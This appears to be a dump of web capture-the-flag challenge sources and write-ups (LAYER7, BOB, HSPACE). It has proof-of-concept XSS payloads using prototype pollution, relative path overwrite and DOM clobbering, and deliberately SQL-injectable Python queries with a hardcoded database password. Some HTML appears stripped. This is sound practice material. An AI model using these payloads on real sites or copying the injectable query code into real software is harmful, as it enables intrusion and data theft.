39 | 40 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/breadfactorytemplate.psd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/breadfactorytemplate.psd -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-aside.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-aside.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-blog-heading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-blog-heading.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-body.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-body.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-content.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-content.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-footer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-footer.gif -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-header.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-header.gif -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/bg-menu-selected2.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/collection.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/collection.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/croissants.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/croissants.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/favorites.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/favorites.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/icons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/icons.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/interface.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/loafs.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/loafs.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/logo.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/sandwiches.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/sandwiches.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/traditional.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/traditional.jpg -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/images/whats-new.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2021/LAYER7_CTF/handmade/src/htdocs/images/whats-new.png -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | urllib3==1.26.7 5 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res.encode() 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res.encode() 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res.encode() 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res.encode() 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res.encode() 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | 76 | res = ('\r\n'.join(res)).encode() 77 | res += b'\r\n\r\n' 78 | res += content 79 | 80 | return res -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /service 4 | COPY ./src /service 5 | RUN chmod 777 -R /service 6 | 7 | COPY ./flag /flag 8 | 9 | RUN pip install -r /service/requirements.txt 10 | 11 | EXPOSE 8080 12 | ENTRYPOINT ["python"] 13 | CMD ["/service/app.py"] -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/flag: -------------------------------------------------------------------------------- 1 | LAYER7{XXXXXXXXX} -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/contents/1: -------------------------------------------------------------------------------- 1 | this is first content -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/contents/2: -------------------------------------------------------------------------------- 1 | this is second content -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 |

hello

-------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | requests==2.26.0 5 | urllib3==1.26.7 6 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/selfmade/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/dom_clobbering/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC: 2 | ?username=%27> 3 | 4 | 5 | 풀이 설명: 6 | 7 | 1. DOM Clobbering을 이용하여 APPINFO.message.title의 값을 임의로 설정할 수 있다. 8 | 9 | 2. -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/config.js: -------------------------------------------------------------------------------- 1 | function appInit(){ 2 | _get = parseParams(location.search.slice(1)); 3 | htmlSanitizer = new goog.html.sanitizer.HtmlSanitizer(); 4 | } 5 | 6 | function parseParams(queryString, decodeKeys, decodeValues){ 7 | if (decodeKeys == null) decodeKeys = true; 8 | if (decodeValues == null) decodeValues = true; 9 | 10 | var vars = queryString.split(/[&;]/); 11 | var obj = {}; 12 | if (!vars.length) return obj; 13 | 14 | vars.forEach(function(val){ 15 | var index = val.indexOf('=') + 1; 16 | var value = index ? val.substr(index) : ''; 17 | var keys = index ? val.substr(0, index - 1).match(/([^\]\[]+|(\B)(?=\]))/g) : [val]; 18 | 19 | if (!keys) return; 20 | if (decodeValues) value = decodeURIComponent(value); 21 | keys.forEach(function(key, i){ 22 | if (decodeKeys) key = decodeURIComponent(key); 23 | var current = obj[key]; 24 | 25 | if (i < keys.length - 1) obj = obj[key] = current || {}; 26 | else if (typeof(current) == 'array') current.push(value); 27 | else obj[key] = current != null ? [current, value] : value; 28 | }); 29 | }); 30 | 31 | return obj; 32 | } -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 14 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/pp/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC: 2 | ?__proto__[*%20SRC]=1&constructor[prototype][*%20ONERROR]=1&msg= 3 | 4 | 5 | 풀이 설명: 6 | 7 | 1. parseParams 함수에서 prototype pollution이 발생한다. 8 | -> config.js의 21~28 line 9 | 10 | 2. prototype pollution을 통해 closure모듈(html sanitize)에서 임의의 속성값을 allow할 수 있게끔 변수 조작이 가능하다. 11 | -> Object.prototype['* ONERROR'] = 1; 12 | Object.prototype['* SRC'] = 1; 13 | 14 | 3. ?__proto__[* SRC]=1&constructor[prototype][* ONERROR]=1 로 오염시키고, msg에서 XSS하면 된다. 15 | 16 | 17 | 레퍼런스: https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/config.js: -------------------------------------------------------------------------------- 1 | /* default values config */ 2 | let name = "admin"; 3 | let msg = "Can you get what you want?"; -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 |
14 |
15 | 29 | 30 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/writeup/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2022/BOB_WEB_CTF/rpo/writeup/writeup.txt: -------------------------------------------------------------------------------- 1 | PoC(exploit.html): 2 | 7 | 8 | exploit.html을 공격자 서버로 올리고, 봇 접속을 공격자 서버의 exploit.html로 유도. 9 | 10 | 11 | 풀이 설명: 12 | 13 | 1. Relative Path Overwrite 공격으로 config.js를 불러오지 못하게한다. 14 | 15 | -> http://문제url/index.php/aaaaaa 16 | 17 | 2. 1번 과정을 통해 window.name 설정이 자유로워진다. (config.js에서 초기화하지 않기 때문에) 18 | 19 | -> window.name은 origin이 바뀌어도 그대로 유지된다는 점 이용하여 스크립트 삽입 20 | 21 | 3. 단, name을 5자로 자르고 있다. name = name.substr(0, 5); 22 | 23 | -> window.name=' 위와 같이 window.name을 조작하여 다시 문제 url로 redirect 시킨다. 25 | 26 | 4. msg를 '" src=x onerror=alert(1)>'로 설정해주면 alert(1)가 실행된다. 27 | 28 | ->

${name} said "${msg}"

29 | 30 | ->

"

31 | 32 | -> alert(1)! 33 | 34 | 35 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mariadb:latest 2 | 3 | RUN apt update && apt install -y python3 python3-pip vim curl 4 | 5 | RUN mkdir /app 6 | COPY ./admin/src/ /app 7 | RUN chmod 777 -R /app 8 | 9 | RUN pip install -r /app/requirements.txt 10 | 11 | COPY ./admin/flag.txt /flag.txt 12 | RUN chmod 777 /flag.txt 13 | 14 | EXPOSE 80 -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/db/init.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES utf8mb4; 3 | 4 | CREATE TABLE `admin` ( 5 | `username` VARCHAR(32) NOT NULL, 6 | `password` VARCHAR(32) NOT NULL, 7 | `token` VARCHAR(64) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | 10 | CREATE TABLE `notice` ( 11 | `notice_id` VARCHAR(36) NOT NULL, 12 | `title` VARCHAR(32) NOT NULL, 13 | `contents` TEXT NOT NULL 14 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 15 | 16 | INSERT INTO `admin` VALUES ('admin', '[CENSORED]', '[CENSORED]'); 17 | INSERT INTO `notice` VALUES 18 | ('cf14a064-f06b-4cfc-95d4-3acca4dd945d', 'Welcome to hpsace proxy.', "Hspace proxy is free online proxy service,\nBut it's still a beta version."), 19 | ('5acf8929-990f-49a5-90a0-cd00c9179670', 'How do I use this service?', "It's very simple to use.\nEnter the url and click the connect button."), 20 | ('5162d7a3-31da-4dc0-87d6-2be3f3ca47bf', 'Launch bug bounty program!', 'We have launched bug bounty!\nPlease find vulnerabilities in our service :)'); 21 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/flag.txt: -------------------------------------------------------------------------------- 1 | hspace{fake-flag} -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Admin panel 7 | 8 | 9 |

Admin panel

10 |

Hspace proxy admin panel

11 |
12 | 13 | 14 | 15 |
16 | 17 | 29 | 30 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/htdocs/write.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Admin panel 7 | 8 | 9 |

Admin panel

10 |

Hspace proxy admin panel (notice write)

11 |
12 |
13 | 14 | 15 |
16 | 17 | 31 | 32 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/model.py: -------------------------------------------------------------------------------- 1 | import pymysql 2 | import uuid 3 | 4 | def connect_db(): 5 | return pymysql.connect( 6 | host='localhost', 7 | user='root', 8 | passwd='hspace', 9 | db='hspace_proxy', 10 | charset='utf8mb4', 11 | cursorclass=pymysql.cursors.DictCursor) 12 | 13 | def check_token(token): 14 | db = connect_db() 15 | cursor = db.cursor() 16 | cursor.execute("SELECT token FROM admin LIMIT 1") 17 | fetch = cursor.fetchone() 18 | db.close() 19 | 20 | if fetch['token'] != token: 21 | return False 22 | 23 | return True 24 | 25 | def login(username, password): 26 | try: 27 | db = connect_db() 28 | cursor = db.cursor() 29 | cursor.execute(f"SELECT * FROM admin WHERE username='{username}' AND password='{password}'") 30 | fetch = cursor.fetchone() 31 | db.close() 32 | 33 | if fetch: 34 | return {"status": True, "token": fetch['token']} 35 | 36 | return {"status": False} 37 | except: 38 | return {"status": False} 39 | 40 | def write_notice(title, contents): 41 | try: 42 | db = connect_db() 43 | cursor = db.cursor() 44 | notice_id = str(uuid.uuid4()) 45 | cursor.execute(f"INSERT INTO notice VALUE ('{notice_id}', '{title}', '{contents}')") 46 | db.commit() 47 | db.close() 48 | 49 | return {"status": True, "notice_id": notice_id} 50 | except: 51 | return {"status": False} -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | requests==2.26.0 5 | urllib3==1.26.7 6 | pymysql==1.0.2 -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/admin/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | public: 5 | build: 6 | context: . 7 | dockerfile: ./public/Dockerfile 8 | restart: always 9 | ports: 10 | - "8080:8080" 11 | links: 12 | - admin.internal 13 | 14 | admin.internal: 15 | build: 16 | context: . 17 | dockerfile: ./admin/Dockerfile 18 | restart: always 19 | volumes: 20 | - ./admin/db:/docker-entrypoint-initdb.d 21 | environment: 22 | - MYSQL_ROOT_PASSWORD=hspace 23 | - MYSQL_DATABASE=hspace_proxy 24 | - MYSQL_TCP_PORT=3306 25 | - TZ=Asia/Seoul 26 | entrypoint: ["/bin/bash", "-c"] 27 | command: 28 | - | 29 | docker-entrypoint.sh mariadbd & 30 | python3 /app/app.py -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN mkdir /app 4 | COPY ./public/src /app 5 | RUN chmod 777 -R /app 6 | 7 | RUN pip install -r /app/requirements.txt 8 | 9 | EXPOSE 8080 10 | ENTRYPOINT ["python"] 11 | 12 | CMD ["/app/app.py"] -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Hspace proxy 7 | 8 | 9 | 10 |

Hspace proxy

11 |

free online proxy (beta version)

12 |
13 |
14 | GET 15 | POST
16 |
17 | 18 | 19 |
20 | 21 | 38 | 39 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/htdocs/notice.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Hspace proxy 7 | 8 | 9 | 10 |

Hspace proxy

11 |

Top notice

12 |
13 |
14 |
15 | 32 | 33 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/model.py: -------------------------------------------------------------------------------- 1 | import pymysql 2 | import uuid 3 | 4 | def connect_db(): 5 | return pymysql.connect( 6 | host='admin.internal', 7 | user='root', 8 | passwd='hspace', 9 | db='hspace_proxy', 10 | charset='utf8mb4', 11 | cursorclass=pymysql.cursors.DictCursor) 12 | 13 | def read_notice(notice_id): 14 | try: 15 | db = connect_db() 16 | cursor = db.cursor() 17 | cursor.execute(f"SELECT * FROM notice WHERE notice_id='{notice_id}'") 18 | fetch = cursor.fetchone() 19 | db.close() 20 | 21 | if fetch: 22 | return {"status": True, "data": fetch} 23 | 24 | return {"status": False} 25 | except: 26 | return {"status": False} 27 | 28 | def list_notice(): 29 | try: 30 | db = connect_db() 31 | cursor = db.cursor() 32 | cursor.execute(f"SELECT * FROM notice WHERE 1 LIMIT 3") 33 | rows = cursor.fetchall() 34 | retval = [] 35 | 36 | for row in rows: 37 | retval.append(row) 38 | 39 | db.close() 40 | return retval 41 | except: 42 | return [] -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | requests==2.26.0 5 | urllib3==1.26.7 6 | pymysql==1.0.2 -------------------------------------------------------------------------------- /2022/HSPACE_CTF/hspace_proxy/public/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/HSPACE_CTF/lucky7/index.php: -------------------------------------------------------------------------------- 1 | '\"\s])/", null, $_GET['jscode']) : 'print()'; 13 | if(strlen($jscode) > 7*7*7) $jscode = 'print()'; 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 | Lucky7 21 | 22 | 23 |

Lucky7

24 | 25 | If you can steal `flag` variable, please send a payload here.
26 | source 27 | 28 |
29 | 33 | 34 | 35 |
